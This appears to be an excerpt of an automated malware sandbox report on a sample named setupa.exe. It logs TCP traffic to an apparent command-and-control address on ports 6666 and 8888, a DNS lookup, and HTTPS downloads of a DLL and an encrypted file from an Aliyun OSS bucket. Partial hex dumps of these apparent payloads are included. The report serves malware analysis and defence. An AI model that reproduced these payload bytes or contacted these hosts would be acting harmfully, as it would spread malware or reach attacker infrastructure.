                                                                                                            Oct 7, 2024 06:39:26.122354031 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:26.122785091 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:26.127804995 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.524801970 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:33.529740095 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.529762030 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.529831886 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.529839993 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:34.085776091 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:34.088735104 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:34.093734026 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.346658945 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:38.351790905 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.656737089 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.705842972 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:38.728533030 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:38.733592987 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.733629942 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.733658075 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.733736038 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:44.768604994 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:44.773614883 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.092762947 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.143449068 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:45.151835918 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:45.156829119 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.156842947 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.156864882 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.156888962 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:56.299850941 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:56.304857969 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:56.698935986 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:56.752871990 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:56.768667936 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:56.773473978 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:56.773540974 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:56.773554087 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:56.773664951 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:01.737974882 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:01.743467093 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:02.062403917 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:02.112432957 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:02.526561975 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:02.532135963 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:02.532176018 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:02.532205105 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:02.532238007 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:14.725646973 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:14.731060028 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:15.036048889 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:15.081170082 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:15.114309072 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:15.119721889 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:15.119766951 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:15.119807959 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:15.119842052 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:21.331665039 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:21.337133884 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:21.656496048 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:21.706485987 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:22.104919910 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:22.110218048 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:22.110259056 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:22.110286951 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:22.110317945 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:34.518922091 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:34.519037962 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:34.524056911 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:34.524111986 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:36.473982096 CEST499988888192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:36.479155064 CEST88884999847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:36.479356050 CEST499988888192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:38.509994984 CEST88884999847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:38.511511087 CEST499988888192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:38.514808893 CEST499988888192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:41.612870932 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:41.618215084 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:41.952647924 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:42.034607887 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:42.093835115 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:40:42.099287033 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:42.099325895 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:42.099353075 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:40:42.099407911 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:01.378767014 CEST499996666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:41:01.383821011 CEST66664999947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:01.383893013 CEST499996666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:41:02.159769058 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:41:02.164980888 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:02.484060049 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:02.560877085 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:41:02.565942049 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:02.565977097 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:02.566004038 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:02.566328049 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:08.190325022 CEST499996666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:41:08.195765972 CEST66664999947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:08.195805073 CEST66664999947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:08.195837975 CEST66664999947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:08.195864916 CEST66664999947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:08.936085939 CEST66664999947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:41:08.936307907 CEST499996666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:41:08.941257954 CEST66664999947.239.116.158192.168.2.5

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 7, 2024 06:39:01.617942095 CEST5559153192.168.2.51.1.1.1
                                                                                                            Oct 7, 2024 06:39:01.813401937 CEST53555911.1.1.1192.168.2.5

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Oct 7, 2024 06:39:01.617942095 CEST192.168.2.51.1.1.10x877aStandard query (0)kehu8.oss-cn-hongkong.aliyuncs.comA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Oct 7, 2024 06:39:01.813401937 CEST1.1.1.1192.168.2.50x877aNo error (0)kehu8.oss-cn-hongkong.aliyuncs.com47.79.64.157A (IP address)IN (0x0001)false
                                                                                                            Oct 7, 2024 06:39:14.336462021 CEST1.1.1.1192.168.2.50x20c9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Oct 7, 2024 06:39:14.336462021 CEST1.1.1.1192.168.2.50x20c9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • kehu8.oss-cn-hongkong.aliyuncs.com

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.54970447.79.64.1574434768C:\Users\user\Desktop\setupa.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-10-07 04:39:03 UTC138OUTGET /ClassicStartMenuDLL.dll HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            User-Agent: SecureWinHTTP/1.0
                                                                                                            Host: kehu8.oss-cn-hongkong.aliyuncs.com
                                                                                                            2024-10-07 04:39:03 UTC562INHTTP/1.1 200 OK
                                                                                                            Server: AliyunOSS
                                                                                                            Date: Mon, 07 Oct 2024 04:39:03 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 243712
                                                                                                            Connection: close
                                                                                                            x-oss-request-id: 670365E7D7863C3331B7D28D
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: "D48560E3661D0EAE2E67CB13044710C3"
                                                                                                            Last-Modified: Mon, 23 Sep 2024 14:23:44 GMT
                                                                                                            x-oss-object-type: Normal
                                                                                                            x-oss-hash-crc64ecma: 12115741117753056869
                                                                                                            x-oss-storage-class: Standard
                                                                                                            x-oss-ec: 0048-00000113
                                                                                                            Content-Disposition: attachment
                                                                                                            x-oss-force-download: true
                                                                                                            Content-MD5: 1IVg42YdDq4uZ8sTBEcQww==
                                                                                                            x-oss-server-time: 44
                                                                                                            2024-10-07 04:39:03 UTC15822INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 82 3e 0c 67 c6 5f 62 34 c6 5f 62 34 c6 5f 62 34 72 c3 93 34 c8 5f 62 34 72 c3 91 34 bb 5f 62 34 72 c3 90 34 df 5f 62 34 1b a0 a9 34 c1 5f 62 34 c6 5f 63 34 47 5f 62 34 58 ff a5 34 c7 5f 62 34 23 06 61 35 d1 5f 62 34 23 06 67 35 a7 5f 62 34 23 06 66 35 d1 5f 62 34 c6 5f 62 34 c2 5f 62 34 34 06 61 35 c7 5f 62 34 34 06 66 35 c7 5f 62 34 34 06 67 35 c4 5f 62 34 34 06 62 35 c7 5f 62
                                                                                                            Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$>g_b4_b4_b4r4_b4r4_b4r4_b44_b4_c4G_b4X4_b4#a5_b4#g5_b4#f5_b4_b4_b44a5_b44f5_b44g5_b44b5_b
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: 24 89 44 24 04 56 57 e8 16 73 00 00 8b 0c 24 b8 32 fa 9d 13 01 c1 b0 01 89 44 24 0c e9 81 fe ff ff 90 31 d2 81 f9 2d 49 9b a8 0f 9f c2 c1 e2 04 8b 94 02 cc 00 00 00 01 da ff e2 31 d2 81 f9 f1 c5 8a a6 0f 9c c2 c1 e2 06 8b 54 02 0c 01 da ff e2 81 f9 2c 8b ac 93 ba 54 00 00 00 be 98 00 00 00 0f 44 d6 8b 04 10 01 d8 ff e0 8b 0c 24 b8 32 fa 9d 13 c7 44 24 0c 00 00 00 00 01 c1 e9 20 fe ff ff 81 f9 90 f0 2e 6d ba c4 00 00 00 be 00 00 00 00 0f 4c d6 8b 14 10 01 da ff e2 81 f9 a1 23 7c 5f ba 58 00 00 00 be 6c 00 00 00 0f 4c d6 8b 14 10 01 da ff e2 81 f9 4d 21 f4 5a ba 04 00 00 00 be e4 00 00 00 0f 44 d6 8b 04 10 01 d8 ff e0 8b 44 24 1c 89 44 24 18 8b 44 24 18 8b 00 89 44 24 14 e9 69 02 00 00 81 f9 63 a5 e7 92 ba 64 00 00 00 be a8 00 00 00 0f 4c d6 8b 14 10 01 da
                                                                                                            Data Ascii: $D$VWs$2D$1-I1T,TD$2D$ .mL#|_XlLM!ZDD$D$D$D$icdL
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: 45 d8 c7 45 d8 94 17 0f 2e 50 e8 c3 0a 00 00 8b 35 3c 71 03 10 85 c0 b8 2c 00 00 00 b9 04 00 00 00 ba 8c 38 2c 8d 0f 44 c8 03 94 0e 44 43 c0 08 ff e2 a1 38 71 03 10 83 88 44 43 c0 08 04 8d 45 d8 c7 45 d8 94 17 0f 2e 50 e8 74 0d 00 00 8b 35 3c 71 03 10 31 c9 85 c0 ba 8c 38 2c 8d 0f 95 c1 03 94 8e 50 43 c0 08 ff e2 a1 38 71 03 10 83 88 44 43 c0 08 08 8d 45 d8 c7 45 d8 94 17 0f 2e 50 e8 dd cb ff ff 8b 35 3c 71 03 10 85 c0 b8 08 00 00 00 b9 24 00 00 00 ba 8c 38 2c 8d 0f 44 c8 03 94 0e 44 43 c0 08 ff e2 a1 38 71 03 10 83 88 44 43 c0 08 10 8d 45 d7 c7 45 d8 94 17 0f 2e 8d 4d d0 50 51 8d 45 d8 50 e8 26 e1 ff ff 83 7d d0 00 8b 35 3c 71 03 10 ba 34 00 00 00 b9 1c 00 00 00 0f 44 d1 85 c0 0f 48 d1 b9 8c 38 2c 8d 8b 84 16 44 43 c0 08 01 c8 ff e0 a1 38 71 03 10 31 f6
                                                                                                            Data Ascii: EE.P5<q,8,DDC8qDCEE.Pt5<q18,PC8qDCEE.P5<q$8,DDC8qDCEE.MPQEP&}5<q4DH8,DC8q1
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: da ff e2 3d 86 f7 5c 16 ba 08 00 00 00 be 30 01 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 a1 ac 71 03 10 b9 ca 5b 85 61 c7 04 38 98 00 00 00 8b 04 24 c7 44 24 04 98 00 00 00 01 c8 e9 63 fb ff ff 31 d2 3d 1d 19 cb f4 0f 9c c2 8b 54 91 14 01 da ff e2 3d 11 5d 55 ee ba d8 00 00 00 be 34 01 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 a1 ac 71 03 10 b9 ca 5b 85 61 c7 04 38 80 00 00 00 8b 04 24 c7 44 24 04 80 00 00 00 01 c8 e9 15 fb ff ff 3d 5b f7 b7 63 ba 74 00 00 00 be c4 00 00 00 0f 4c d6 8b 14 11 01 da ff e2 3d 2e 86 45 61 ba ac 00 00 00 be 54 00 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 8b 4c 24 08 8b 14 24 b8 a9 a5 e9 f8 be d1 6c ea aa 01 c2 8b 04 24 01 f0 83 f9 08 0f 44 c2 e9 c0 fa ff ff 3d 13 d6 e1 11 ba b8 00 00 00 be 64 00 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 a1 ac 71 03
                                                                                                            Data Ascii: =\0Dq[a8$D$c1=T=]U4Dq[a8$D$=[ctL=.EaTDL$$l$D=dDq
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: 50 ff 15 0c b0 02 10 83 c4 08 5e 5f 5b 5d ff e0 cc cc 55 53 57 56 83 ec 34 b9 b4 34 4a 47 be 6c c0 3e 64 bf 04 00 00 00 bd 14 00 00 00 c7 04 24 94 17 0f 2e eb 18 66 2e 0f 1f 84 00 00 00 00 00 66 90 8b 0c 24 b8 a8 c7 d6 17 01 c1 b0 01 89 44 24 08 eb 1e 81 f9 3c df e5 45 ba 50 00 00 00 bb 20 00 00 00 0f 44 d3 8b 84 10 e0 6c 0f 58 01 f0 ff e0 a1 80 75 03 10 31 d2 81 f9 13 bf 25 09 0f 9f c2 8b 94 d0 20 6d 0f 58 01 f2 ff e2 81 f9 1f 20 8f c7 ba 28 00 00 00 0f 4c d7 8b 94 10 e0 6c 0f 58 01 f2 ff e2 81 f9 55 5e a5 b6 ba 44 00 00 00 bb 1c 00 00 00 0f 4c d3 8b 94 10 e0 6c 0f 58 01 f2 ff e2 31 d2 81 f9 69 db e2 a3 0f 95 c2 c1 e2 05 8b 84 02 14 6d 0f 58 01 f0 ff e0 8b 0c 24 b8 66 8d 3b 4c c7 44 24 0c 00 00 00 00 01 c1 eb 81 90 81 f9 b4 34 4a 47 ba 74 00 00 00 0f 4c
                                                                                                            Data Ascii: P^_[]USWV44JGl>d$.f.f$D$<EP DlXu1% mX (LlXU^DLlX1imX$f;LD$4JGtL
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: 18 eb 1f 6a 06 ff d7 8b 04 24 b9 d4 b5 47 fd 31 ed 01 c8 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 3d 14 61 22 f7 ba 04 00 00 00 7c 05 ba 98 00 00 00 8b 0d 64 83 03 10 8b 94 11 f4 16 f3 50 81 c1 f4 16 f3 50 01 f2 ff e2 3d f3 01 e0 c1 ba 24 00 00 00 7c 05 ba e8 00 00 00 8b 14 11 01 f2 ff e2 31 d2 3d e7 65 2b a7 0f 9c c2 c1 e2 05 8b 54 0a 38 01 f2 ff e2 3d e2 0b 94 9c ba 6c 00 00 00 7c 05 ba 88 00 00 00 8b 14 11 01 f2 ff e2 3d 52 1d da 8e ba 40 00 00 00 74 05 ba 64 00 00 00 8b 0c 11 01 f1 ff e1 66 2e 0f 1f 84 00 00 00 00 00 90 3d df 9d 38 54 ba 0c 00 00 00 7c 05 ba a4 00 00 00 8b 14 11 01 f2 ff e2 3d b7 66 07 1d ba 4c 00 00 00 7c 05 ba 30 00 00 00 8b 14 11 01 f2 ff e2 3d 98 20 c9 02 ba 48 00 00 00 7c 05 ba d4 00 00 00 8b 14 11 01 f2 ff e2 3d 14 61 22 f7
                                                                                                            Data Ascii: j$G1f.D=a"|dPP=$|1=e+T8=l|=R@tdf.=8T|=fL|0= H|=a"
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: 75 0c ff 75 08 e8 b1 fe ff ff 83 c4 0c 5d c2 0c 00 53 56 57 6a 00 68 a0 0f 00 00 68 2c 92 03 10 e8 f6 2d 00 00 83 c4 0c 68 28 c3 02 10 ff 15 40 b0 02 10 8b f0 85 f6 0f 84 8c 00 00 00 68 44 c3 02 10 56 ff 15 0c b0 02 10 68 60 c3 02 10 56 8b d8 ff 15 0c b0 02 10 68 7c c3 02 10 56 8b f8 ff 15 0c b0 02 10 8b f0 85 db 74 37 85 ff 74 33 85 f6 74 2f 83 25 48 92 03 10 00 8b cb 68 44 92 03 10 e8 6a 08 00 00 ff d3 57 e8 5e 2a 00 00 56 a3 4c 92 03 10 e8 53 2a 00 00 59 59 a3 50 92 03 10 eb 16 33 c0 50 50 6a 01 50 ff 15 6c b0 02 10 a3 48 92 03 10 85 c0 74 11 68 9f 8a 01 10 e8 c3 05 00 00 59 5f 5e 33 c0 5b c3 6a 07 e8 a7 06 00 00 cc 68 2c 92 03 10 ff 15 60 b0 02 10 a1 48 92 03 10 85 c0 74 07 50 ff 15 20 b0 02 10 c3 55 8b ec e8 96 00 00 00 8b 45 08 83 20 00 e8 d8 00 00
                                                                                                            Data Ascii: uu]SVWjhh,-h(@hDVh`Vh|Vt7t3t/%HhDjW^*VLS*YYP3PPjPlHthY_^3[jh,`HtP UE
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: 6a fe 68 80 c9 01 10 64 ff 35 00 00 00 00 a1 90 83 03 10 33 c4 50 8d 44 24 04 64 a3 00 00 00 00 8b 44 24 28 8b 58 08 8b 70 0c 83 fe ff 74 3a 83 7c 24 2c ff 74 06 3b 74 24 2c 76 2d 8d 34 76 8b 0c b3 89 4c 24 0c 89 48 0c 83 7c b3 04 00 75 17 68 01 01 00 00 8b 44 b3 08 e8 49 00 00 00 8b 44 b3 08 e8 5f 00 00 00 eb b7 8b 4c 24 04 64 89 0d 00 00 00 00 83 c4 18 5f 5e 5b c3 33 c0 64 8b 0d 00 00 00 00 81 79 04 80 c9 01 10 75 10 8b 51 0c 8b 52 0c 39 51 08 75 05 b8 01 00 00 00 c3 53 51 bb 10 84 03 10 eb 0b 53 51 bb 10 84 03 10 8b 4c 24 0c 89 4b 08 89 43 04 89 6b 0c 55 51 50 58 59 5d 59 5b c2 04 00 ff d0 c3 cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 10 33 c0 53 56 83 ca ff 57 83 f9 ff 0f 84 96 00 00 00 8b 7d 08 8d 9b 00 00 00 00 8b 5d 0c 8d 0c 49 8b 74 8b 08 8d 1c 8b
                                                                                                            Data Ascii: jhd53PD$dD$(Xpt:|$,t;t$,v-4vL$H|uhDID_L$d_^[3dyuQR9QuSQSQL$KCkUQPXY]Y[UM3SVW}]It
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: 04 24 2c 9a 03 10 e8 77 ff ff ff 59 b0 01 c3 b0 01 c3 e8 8a fb ff ff b0 01 c3 a1 90 83 03 10 56 6a 20 83 e0 1f 33 f6 59 2b c8 d3 ce 33 35 90 83 03 10 56 e8 00 07 00 00 56 e8 4f 01 00 00 56 e8 aa 33 00 00 56 e8 81 21 00 00 56 e8 48 f9 ff ff 83 c4 14 b0 01 5e c3 6a 00 e8 9d ae ff ff 59 c3 a1 c8 8a 03 10 83 c9 ff 56 f0 0f c1 08 75 1b a1 c8 8a 03 10 be a8 88 03 10 3b c6 74 0d 50 e8 f8 03 00 00 59 89 35 c8 8a 03 10 ff 35 94 9b 03 10 e8 e6 03 00 00 ff 35 98 9b 03 10 33 f6 89 35 94 9b 03 10 e8 d3 03 00 00 ff 35 a0 9e 03 10 89 35 98 9b 03 10 e8 c2 03 00 00 ff 35 a4 9e 03 10 89 35 a0 9e 03 10 e8 b1 03 00 00 83 c4 10 89 35 a4 9e 03 10 b0 01 5e c3 8b ff 55 8b ec 8d 41 04 8b d0 2b d1 83 c2 03 56 33 f6 c1 ea 02 3b c1 1b c0 f7 d0 23 c2 74 0d 8b 55 08 46 89 11 8d 49 04
                                                                                                            Data Ascii: $,wYVj 3Y+35VVOV3V!VH^jYVu;tPY5553555555^UA+V3;#tUFI
                                                                                                            2024-10-07 04:39:03 UTC16384INData Raw: c3 8b ff 55 8b ec 51 51 a1 90 83 03 10 33 c5 89 45 fc 53 56 8b 75 18 57 85 f6 7e 14 56 ff 75 14 e8 ec 2b 00 00 59 3b c6 59 8d 70 01 7c 02 8b f0 8b 7d 24 85 ff 75 0b 8b 45 08 8b 00 8b 78 08 89 7d 24 33 c0 39 45 28 6a 00 6a 00 56 ff 75 14 0f 95 c0 8d 04 c5 01 00 00 00 50 57 ff 15 d4 b0 02 10 89 45 f8 85 c0 0f 84 8d 01 00 00 8d 14 00 8d 4a 08 3b d1 1b c0 85 c1 74 52 8d 4a 08 3b d1 1b c0 23 c1 8d 4a 08 3d 00 04 00 00 77 1d 3b d1 1b c0 23 c1 e8 6a 4a 00 00 8b dc 85 db 0f 84 4c 01 00 00 c7 03 cc cc 00 00 eb 1d 3b d1 1b c0 23 c1 50 e8 9f c4 ff ff 8b d8 59 85 db 0f 84 2d 01 00 00 c7 03 dd dd 00 00 83 c3 08 eb 02 33 db 85 db 0f 84 18 01 00 00 ff 75 f8 53 56 ff 75 14 6a 01 57 ff 15 d4 b0 02 10 85 c0 0f 84 ff 00 00 00 8b 7d f8 33 c0 50 50 50 50 50 57 53 ff 75 10 ff
                                                                                                            Data Ascii: UQQ3ESVuW~Vu+Y;Yp|}$uEx}$39E(jjVuPWEJ;tRJ;#J=w;#jJL;#PY-3uSVujW}3PPPPPWSu


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.54970547.79.64.1574434768C:\Users\user\Desktop\setupa.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-10-07 04:39:05 UTC122OUTGET /upup.ox HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            User-Agent: SecureWinHTTP/1.0
                                                                                                            Host: kehu8.oss-cn-hongkong.aliyuncs.com
                                                                                                            2024-10-07 04:39:05 UTC561INHTTP/1.1 200 OK
                                                                                                            Server: AliyunOSS
                                                                                                            Date: Mon, 07 Oct 2024 04:39:05 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 89088
                                                                                                            Connection: close
                                                                                                            x-oss-request-id: 670365E964BB29343149E8D6
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: "0528A5A3C232862A4B0D9624B6F23D0C"
                                                                                                            Last-Modified: Mon, 23 Sep 2024 14:23:44 GMT
                                                                                                            x-oss-object-type: Normal
                                                                                                            x-oss-hash-crc64ecma: 17776391884417394777
                                                                                                            x-oss-storage-class: Standard
                                                                                                            x-oss-ec: 0048-00000113
                                                                                                            Content-Disposition: attachment
                                                                                                            x-oss-force-download: true
                                                                                                            Content-MD5: BSilo8IyhipLDZYktvI9DA==
                                                                                                            x-oss-server-time: 24
                                                                                                            2024-10-07 04:39:05 UTC15823INData Raw: a8 4b 10 75 55 22 a4 d9 1b 78 a1 d0 d0 15 64 e0 4d fc 37 8a 7c f7 69 5f 63 5e 5e eb 4b 5d 59 4d 28 7d 84 2f 09 7f 81 87 e4 dc 09 cd 31 eb 7b 51 4d 3c ef 78 0c af 2e 80 07 5b e3 78 b0 f1 93 de 35 0d 0b 68 69 7a a6 6b da ce 29 70 86 32 e4 94 a6 07 71 ea 3d ba b4 3f 73 3b 8a a3 27 db 2c 66 a4 78 1a 4e fc ea 68 05 d7 7d fc b9 1a f8 4b b3 49 c5 af 12 a5 19 38 c4 51 39 f1 39 58 9d 33 e5 7a 64 6a de f6 e4 47 83 6d a0 f3 98 42 8d 7b 13 e2 5f 6b 40 5a 09 6e 10 84 64 78 53 0d 45 74 dc d6 7f 8f 8c ab 49 65 61 dd ea 02 b3 02 f0 e0 82 48 a8 52 6d 2f 0b 35 ea 09 ce 1a a4 52 5f c4 d9 04 da 47 53 e3 af 32 e0 2c 0c 46 a7 4e 18 20 20 e2 ad 0f f8 bb c6 26 2d 84 db 22 f2 42 dc 5a 8c 10 45 95 47 12 e7 ac f3 54 ec a7 5c a3 df 97 1e 9a 0f 9c cb d2 0f db 3a 99 6d 1b 3c 66 b2 24
                                                                                                            Data Ascii: KuU"xdM7|i_c^^K]YM(}/1{QM<x.[x5hizk)p2q=?s;',fxNh}KI8Q99X3zdjGmB{_k@ZndxSEtIeaHRm/5R_GS2,FN &-"BZEGT\:m<f$
